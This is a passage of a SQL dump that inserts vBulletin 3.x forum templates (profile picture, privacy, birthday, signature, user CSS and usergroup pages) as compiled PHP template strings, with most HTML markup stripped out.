    \r\n\r\n \".(($show[\'maxnote\']) ? (\"\r\n $maxnote\r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[edit_profile_picture]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[your_current_profile_picture]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[no_profile_picture]\r\n \r\n \"$vbphrase[your_profile_picture]\"\r\n \r\n
    $vbphrase[profile_picture_desc]
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n $vbphrase[custom_profile_picture]\r\n\r\n
    \r\n
    \r\n\r\n $vbphrase[may_upload_custom_image_controls]

    \r\n\r\n \r\n $vbphrase[enter_url_to_image]\r\n\r\n
    \r\n \r\n
    \r\n
    \r\n\r\n $vbphrase[option_2_upload_image_from_computer]$vbphrase[upload_image_from_computer]\r\n
    \r\n \r\n \r\n
    \r\n\r\n \r\n $maxnote\r\n \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1208876238, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1431, -1, 'modifyprofileprivacy', '\".(($errors) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[errors_occured_when_submitted]
    \r\n
      $errors
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n
    $vbphrase[profile_privacy]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[display_options]\r\n $vbphrase[block_display_options]

    \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n $profileprivacybits\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    ', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[errors_occured_when_submitted]
    \r\n
      $errors
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n
    $vbphrase[profile_privacy]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[display_options]\r\n $vbphrase[block_display_options]

    \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n $profileprivacybits\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    ', 'template', 1223392225, 'vBulletin Solutions', '3.8.0 Alpha 2', 'vbulletin'), (1432, -1, 'modifyprofile_birthday', '\".(($show[\'birthday_readonly\']) ? (\"\r\n
    \r\n $vbphrase[birth_date] - $birthdate\r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[your_date_of_birth]
    \r\n $vbphrase[contact_admin_to_modify_birthday]

    \r\n $vbphrase[privacy]:
    \r\n \r\n
    \r\n
    \r\n\") : (\"\r\n\r\n
    \r\n $vbphrase[birth_date]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[your_date_of_birth]\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[month]$vbphrase[day]\".(($show[\'birthday_optional\']) ? (\"$vbphrase[year_optional]\") : (\"$vbphrase[year]\")).\"
        
    \r\n userinfo[\'birthday\'] . \"\\\" />\r\n
    \r\n $vbphrase[privacy]
    \r\n \r\n
    \r\n
    \r\n\")).\"', '\r\n
    \r\n $vbphrase[birth_date] - $birthdate\r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[your_date_of_birth]
    \r\n $vbphrase[contact_admin_to_modify_birthday]

    \r\n $vbphrase[privacy]:
    \r\n \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n $vbphrase[birth_date]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[your_date_of_birth]\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[month]$vbphrase[day]$vbphrase[year_optional]$vbphrase[year]
        
    \r\n \r\n
    \r\n $vbphrase[privacy]
    \r\n \r\n
    \r\n
    \r\n
    ', 'template', 1166137587, 'vBulletin Solutions', '3.6.6', 'vbulletin'); INSERT INTO `template` (`templateid`, `styleid`, `title`, `template`, `template_un`, `templatetype`, `dateline`, `username`, `version`, `product`) VALUES (1433, -1, 'modifysignature', '$preview\r\n\r\n
    \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n\".(($show[\'cansigpic\']) ? (\"\r\n\r\n \r\n\r\n\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n
    $vbphrase[edit_signature]
    \r\n
    \r\n
    \r\n\r\n \r\n
    $vbphrase[your_signature]:
    \r\n $messagearea\r\n \r\n\r\n
    \r\n
    \r\n\r\n \".((!$show[\'cansigpic\']) ? (\"\r\n
    \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n
    \r\n \") : (\"\")).\"\r\n
    $vbphrase[signature_picture] 
    \r\n
    \r\n
    \r\n\r\n \".(($sigpicurl) ? (\"\r\n \r\n
    \r\n $vbphrase[your_current_signature_picture]\r\n
    \r\n
    \\\"$vbphrase[your_current_signature_picture]\\\"
    \r\n
    \r\n \".(($show[\'editor_toolbar\']) ? (\"\r\n $vbphrase[insert_signature_picture]
    \r\n
    \r\n \") : (\"\")).\"\r\n \r\n
    \r\n
    \r\n
    \r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n
    \r\n $vbphrase[upload_signature_picture]\r\n\r\n
    \r\n
    \r\n\r\n $vbphrase[may_upload_custom_image_controls]

    \r\n\r\n \".(($show[\'sigpic_url\']) ? (\"\r\n $vbphrase[enter_url_to_image]\r\n\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'sigpic_url\']) ? (\"$vbphrase[option_2_upload_image_from_computer]\") : (\"$vbphrase[upload_image_from_computer]\")).\"\r\n
    \r\n \r\n \r\n
    \r\n\r\n \".(($show[\'maxnote\']) ? (\"\r\n $maxnote\r\n \") : (\"\")).\"\r\n\r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[signature_permissions]\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \".(($show[\'canbbcode\']) ? (\"\r\n
    $vbphrase[allow_bbcode_basic] \".(($show[\'canbbcodebasic\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
    \r\n
    $vbphrase[allow_bbcode_color] \".(($show[\'canbbcodecolor\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
    \r\n
    $vbphrase[allow_bbcode_size] \".(($show[\'canbbcodesize\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
    \r\n
    $vbphrase[allow_bbcode_font] \".(($show[\'canbbcodefont\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
    \r\n
    $vbphrase[allow_bbcode_align] \".(($show[\'canbbcodealign\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
    \r\n
    $vbphrase[allow_bbcode_list] \".(($show[\'canbbcodelist\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
    \r\n
    $vbphrase[allow_bbcode_link] \".(($show[\'canbbcodelink\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
    \r\n
    $vbphrase[allow_html] \".(($show[\'allowhtml\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
    \r\n \") : (\"\r\n
    $vbphrase[allow_bbcode] $vbphrase[no]
    \r\n
    $vbphrase[allow_html] \".(($show[\'allowhtml\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
    \r\n \")).\"\r\n
    \r\n \".(($show[\'canbbcode\']) ? (\"\r\n
    $vbphrase[allow_bbcode_img] \".(($show[\'allowimg\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
    \r\n
    $vbphrase[allow_bbcode_code] \".(($show[\'canbbcodecode\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
    \r\n
    $vbphrase[allow_bbcode_php] \".(($show[\'canbbcodephp\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
    \r\n
    $vbphrase[allow_bbcode_html] \".(($show[\'canbbcodehtml\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
    \r\n
    $vbphrase[allow_bbcode_quote] \".(($show[\'canbbcodequote\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
    \r\n \") : (\"\")).\"\r\n
    $vbphrase[allow_smilies] \".(($show[\'allowsmilies\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
    \r\n
    $vbphrase[can_upload_sig_img] \".(($show[\'cansigpic\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
    \r\n
    $vbphrase[can_upload_ani_gif_sig_img] \".(($show[\'cananimatesigpic\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
    \r\n
    \r\n
    \r\n', '$preview\r\n\r\n
    onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(0, 0)\">\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n
    $vbphrase[edit_signature]
    \r\n
    \r\n
    \r\n\r\n \r\n
    $vbphrase[your_signature]:
    \r\n $messagearea\r\n \r\n\r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    $vbphrase[signature_picture] 
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n
    \r\n $vbphrase[your_current_signature_picture]\r\n
    \r\n
    \"$vbphrase[your_current_signature_picture]\"
    \r\n
    \r\n \r\n $vbphrase[insert_signature_picture]
    \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[upload_signature_picture]\r\n\r\n
    \r\n
    \r\n\r\n $vbphrase[may_upload_custom_image_controls]

    \r\n\r\n \r\n $vbphrase[enter_url_to_image]\r\n\r\n
    \r\n \r\n
    \r\n
    \r\n\r\n $vbphrase[option_2_upload_image_from_computer]$vbphrase[upload_image_from_computer]\r\n
    \r\n \r\n \r\n
    \r\n\r\n \r\n $maxnote\r\n \r\n\r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n
    \r\n \"\"\r\n $vbphrase[signature_permissions]\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n
    $vbphrase[allow_bbcode_basic] $vbphrase[yes]$vbphrase[no]
    \r\n
    $vbphrase[allow_bbcode_color] $vbphrase[yes]$vbphrase[no]
    \r\n
    $vbphrase[allow_bbcode_size] $vbphrase[yes]$vbphrase[no]
    \r\n
    $vbphrase[allow_bbcode_font] $vbphrase[yes]$vbphrase[no]
    \r\n
    $vbphrase[allow_bbcode_align] $vbphrase[yes]$vbphrase[no]
    \r\n
    $vbphrase[allow_bbcode_list] $vbphrase[yes]$vbphrase[no]
    \r\n
    $vbphrase[allow_bbcode_link] $vbphrase[yes]$vbphrase[no]
    \r\n
    $vbphrase[allow_html] $vbphrase[yes]$vbphrase[no]
    \r\n \r\n
    $vbphrase[allow_bbcode] $vbphrase[no]
    \r\n
    $vbphrase[allow_html] $vbphrase[yes]$vbphrase[no]
    \r\n
    \r\n
    \r\n \r\n
    $vbphrase[allow_bbcode_img] $vbphrase[yes]$vbphrase[no]
    \r\n
    $vbphrase[allow_bbcode_code] $vbphrase[yes]$vbphrase[no]
    \r\n
    $vbphrase[allow_bbcode_php] $vbphrase[yes]$vbphrase[no]
    \r\n
    $vbphrase[allow_bbcode_html] $vbphrase[yes]$vbphrase[no]
    \r\n
    $vbphrase[allow_bbcode_quote] $vbphrase[yes]$vbphrase[no]
    \r\n
    \r\n
    $vbphrase[allow_smilies] $vbphrase[yes]$vbphrase[no]
    \r\n
    $vbphrase[can_upload_sig_img] $vbphrase[yes]$vbphrase[no]
    \r\n
    $vbphrase[can_upload_ani_gif_sig_img] $vbphrase[yes]$vbphrase[no]
    \r\n
    \r\n
    \r\n', 'template', 1208876257, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1434, -1, 'modifyusercss', '\".(($errors) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[errors_occured_when_submitted]
    \r\n
      $errors
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n
    $vbphrase[customize_profile]
    \r\n
    \r\n
    \r\n\r\n \".(($usercsspermissions[\'caneditbgimage\']) ? (\"\r\n
    \" . construct_phrase(\"$vbphrase[background_images_album_x]\", \"album.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=\" . $GLOBALS[\'vbulletin\']->userinfo[\'userid\'] . \"\") . \"
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n $usercssbits\r\n
    \r\n\r\n \r\n
    \r\n
    \r\n
    \r\n \\\"\\\"\r\n $vbphrase[usercss_example]\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[usercss_tabletitle]
    $vbphrase[usercss_tableheader]
    $vbphrase[usercss_alternating1]$vbphrase[usercss_alternating2]
    \r\n
    \r\n
    \r\n \r\n
    \r\n \r\n
    $vbphrase[usercss_tablefooter]
    \r\n
    \r\n $vbphrase[usercss_main]\r\n $vbphrase[usercss_linkcolor]\r\n $vbphrase[usercss_shadecolor]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
     \r\n \r\n\r\n
    \r\n
     
    \r\n
    \r\n\r\n\".(($show[\'backgroundpicker\']) ? (\"\r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n \r\n  \r\n
    \r\n
    \r\n $picturerowbits\r\n
    \r\n
    \r\n\") : (\"\")).\"', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[errors_occured_when_submitted]
    \r\n
      $errors
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n
    $vbphrase[customize_profile]
    \r\n
    \r\n
    \r\n\r\n \r\n
    $vbphrase[background_images_album_x]
    \r\n
    \r\n\r\n
    \r\n $usercssbits\r\n
    \r\n\r\n \r\n
    \r\n
    \r\n
    \r\n \"\"\r\n $vbphrase[usercss_example]\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[usercss_tabletitle]
    $vbphrase[usercss_tableheader]
    $vbphrase[usercss_alternating1]$vbphrase[usercss_alternating2]
    \r\n
    \r\n
    \r\n \r\n
    \r\n \r\n
    $vbphrase[usercss_tablefooter]
    \r\n
    \r\n $vbphrase[usercss_main]\r\n $vbphrase[usercss_linkcolor]\r\n $vbphrase[usercss_shadecolor]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
     \r\n \r\n\r\n
    \r\n
     
    \r\n
    \r\n\r\n\r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n \r\n  \r\n
    \r\n
    \r\n $picturerowbits\r\n
    \r\n
    \r\n
    ', 'template', 1218462092, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1435, -1, 'modifyusercss_backgroundbit', '
  • \".(($picture[\'thumburl\']) ? (\"\r\n \\\"$picture[caption_preview]\\\"\r\n\") : (\"\r\n \".(($picture[\'caption_preview\']) ? (\"$picture[caption_preview]\") : (\"$vbphrase[picture]\")).\"\r\n\")).\"
  • ', '
  • \r\n \"$picture[caption_preview]\"\r\n\r\n $picture[caption_preview]$vbphrase[picture]\r\n
  • ', 'template', 1198265110, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'), (1436, -1, 'modifyusercss_backgroundrow', '
      $picturebits
    ', '
    style=\"display: none\">
      $picturebits
    ', 'template', 1198263406, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'), (1437, -1, 'modifyusercss_bit', '
    \r\n $selector[phrase]\r\n \r\n
    \r\n \".(($selector[\'description\']) ? (\"\r\n
    $selector[description]
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'font\']) ? (\"\r\n \r\n \r\n \".(($field_names[\'font_family\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($field_names[\'font_size\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n \".(($field_names[\'font_family\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($field_names[\'font_size\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'textcolor\']) ? (\"\r\n \r\n \r\n \".(($field_names[\'color\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($field_names[\'shadecolor\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($field_names[\'linkcolor\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n \".(($field_names[\'color\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($field_names[\'shadecolor\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($field_names[\'linkcolor\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'border\']) ? (\"\r\n \r\n \r\n \".(($field_names[\'border_color\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($field_names[\'border_style\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($field_names[\'border_width\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($field_names[\'padding\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n \".(($field_names[\'border_color\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($field_names[\'border_style\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($field_names[\'border_width\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($field_names[\'padding\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'background\']) ? (\"\r\n \r\n \r\n \".(($field_names[\'background_color\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($field_names[\'background_image\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n \".(($field_names[\'background_color\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($field_names[\'background_image\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n
    \\\"\\\"\r\n \r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n \r\n \r\n
    \r\n \r\n
    ', '
    \r\n $selector[phrase]\r\n \r\n
    \r\n \r\n
    $selector[description]
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \"\"\r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n \r\n \r\n
    \r\n \r\n
    ', 'template', 1215096648, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1438, -1, 'modifyusercss_error', '
  • \" . construct_phrase(\"$vbphrase[x_has_invalid_properties]\", \"$selectorname\", \"$selector[phrase]\") . \": $invalid_properties_string
  • ', '
  • $vbphrase[x_has_invalid_properties]: $invalid_properties_string
  • ', 'template', 1195125262, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1439, -1, 'modifyusercss_error_link', '$error_link_phrase', '$error_link_phrase', 'template', 1195126022, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1440, -1, 'modifyusercss_headinclude', '\r\n\r\n$usercss_string\r\n\r\n\r\n\".(($show[\'backgroundpicker\']) ? (\"\") : (\"\")).\"\r\n\r\n', '\r\n\r\n$usercss_string\r\n\r\n\r\n\r\n\r\n', 'template', 1209739296, 'vBulletin Solutions', '3.7.1', 'vbulletin'), (1441, -1, 'modifyusergroups', '\".(($show[\'joinrequests\']) ? (\"\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n$joinrequestbits\r\n
    $vbphrase[you_leader_following_groups]
    $vbphrase[user_group]$vbphrase[view_requests]$vbphrase[list_members]
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'nonmembergroups\']) ? (\"\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n$nonmembergroupbits\r\n\r\n \r\n\r\n
    $vbphrase[following_groups_available_to_join]
    $vbphrase[user_group]$vbphrase[joining_conditions]$vbphrase[join_group]
    \r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'membergroups\']) ? (\"\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n$membergroupbits\r\n\r\n \r\n\r\n
    $vbphrase[member_of_following_groups]
    $vbphrase[user_group]$vbphrase[user_title]$vbphrase[leave_group]
    $primarygroup[opentag]$primarygroup[title]$primarygroup[closetag]$primarygroup[usertitle]($vbphrase[cannot_leave_primary_group])
    \r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'displaygroups\']) ? (\"\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n$displaygroupbits\r\n\r\n \r\n\r\n
    $vbphrase[may_be_identified_member_groups]
    $vbphrase[user_group]$vbphrase[user_title] 
    $primarygroup[opentag]$primarygroup[title]$primarygroup[closetag]$primarygroup[usertitle]
    \r\n
    \r\n\") : (\"\")).\"', '\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n$joinrequestbits\r\n
    $vbphrase[you_leader_following_groups]
    $vbphrase[user_group]$vbphrase[view_requests]$vbphrase[list_members]
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n$nonmembergroupbits\r\n\r\n \r\n\r\n
    $vbphrase[following_groups_available_to_join]
    $vbphrase[user_group]$vbphrase[joining_conditions]$vbphrase[join_group]
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n$membergroupbits\r\n\r\n \r\n\r\n
    $vbphrase[member_of_following_groups]
    $vbphrase[user_group]$vbphrase[user_title]$vbphrase[leave_group]
    $primarygroup[opentag]$primarygroup[title]$primarygroup[closetag]$primarygroup[usertitle]($vbphrase[cannot_leave_primary_group])
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n$displaygroupbits\r\n\r\n \r\n\r\n
    $vbphrase[may_be_identified_member_groups]
    $vbphrase[user_group]$vbphrase[user_title] 
    $primarygroup[opentag]$primarygroup[title]$primarygroup[closetag]$primarygroup[usertitle]
    \r\n
    \r\n
    ', 'template', 1208876289, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1442, -1, 'modifyusergroups_displaybit', '\r\n \r\n $usergroup[opentag]$usergroup[title]$usergroup[closetag]\r\n
    $usergroup[description]
    \r\n \r\n $usergroup[usertitle]\r\n \r\n \r\n \r\n', '\r\n \r\n $usergroup[opentag]$usergroup[title]$usergroup[closetag]\r\n
    $usergroup[description]
    \r\n \r\n $usergroup[usertitle]\r\n \r\n \r\n \r\n', 'template', 1077053171, 'vBulletin Solutions', '', 'vbulletin'), (1443, -1, 'modifyusergroups_groupleader', 'session->vars[\'sessionurl\'] . \"u=$leader[userid]\\\">$leader[username]', '$leader[username]', 'template', 1069262102, 'vBulletin Solutions', '', 'vbulletin'), (1444, -1, 'modifyusergroups_joinrequestbit', '\r\n $joinrequest[opentag]$joinrequest[title]$joinrequest[closetag]\r\n $joinrequest[requests] \".(($joinrequest[\'requests\']) ? (\"session->vars[\'sessionurl\'] . \"usergroupid=$joinrequest[usergroupid]\\\">$vbphrase[review_join_requests]\") : (\"\")).\"\r\n session->vars[\'sessionurl\'] . \"usergroupid=$joinrequest[usergroupid]\\\">$vbphrase[list_members]\r\n\r\n', '\r\n $joinrequest[opentag]$joinrequest[title]$joinrequest[closetag]\r\n $joinrequest[requests] $vbphrase[review_join_requests]\r\n $vbphrase[list_members]\r\n\r\n', 'template', 1070080815, 'vBulletin Solutions', '', 'vbulletin'), (1445, -1, 'modifyusergroups_memberbit', '\r\n \r\n $usergroup[opentag]$usergroup[title]$usergroup[closetag]\r\n
    $usergroup[description]
    \r\n \r\n $usergroup[usertitle]\r\n \r\n \".(($show[\'isleader\']) ? (\"\r\n ($vbphrase[leader_of_this_group])
    \r\n \") : (\"\r\n \r\n \")).\"\r\n
    \r\n', '\r\n \r\n $usergroup[opentag]$usergroup[title]$usergroup[closetag]\r\n
    $usergroup[description]
    \r\n \r\n $usergroup[usertitle]\r\n \r\n \r\n ($vbphrase[leader_of_this_group])
    \r\n \r\n \r\n
    \r\n
    \r\n', 'template', 1121360033, 'vBulletin Solutions', '3.5.0 Release Candidate 1', 'vbulletin'), (1446, -1, 'modifyusergroups_nonmemberbit', '\r\n \r\n $usergroup[opentag]$usergroup[title]$usergroup[closetag]\r\n
    $usergroup[description]
    \r\n \r\n \r\n \".(($ismoderated) ? (\"\r\n $vbphrase[requests_approved_by_leader]
    $vbphrase[group_leaders]: $groupleaders\r\n \") : (\"\r\n $vbphrase[anyone_free_to_join_group]\r\n \")).\"\r\n
